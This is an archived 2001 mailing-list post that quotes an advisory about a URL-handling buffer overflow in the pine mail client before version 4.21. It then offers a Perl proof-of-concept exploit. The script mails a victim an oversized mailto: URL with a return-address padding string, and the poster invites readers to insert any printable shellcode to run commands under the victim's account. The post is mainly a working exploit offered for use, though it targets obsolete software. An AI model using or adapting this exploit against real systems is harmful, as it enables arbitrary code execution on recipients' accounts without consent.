~ : Versions of pine prior to 4.21 had a security problem when viewing ~ : URLs. By sending an email with a specially formatted URL embedded ~ : in it, an attacker could cause arbitrary shell code to be executed ~ : under the account of the victim user. ~ : I don't know how dumb user should be to actually to become a victim of such exploitation. Not saying that the bug shouldn't be fixed anywayz. if anyone's interested: #!/usr/bin/perl $sploit="A" x 1078; $sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528 # or higher.. open(FOO,"| /usr/sbin/sendmail -t"); print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n"; print FOO "Mail me: mailto:$sploit"; close(FOO); pull any shellcode you like (but mind it should contain only printable characters 0x20-xff worked for me). -Fyodor
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:13:51 PDT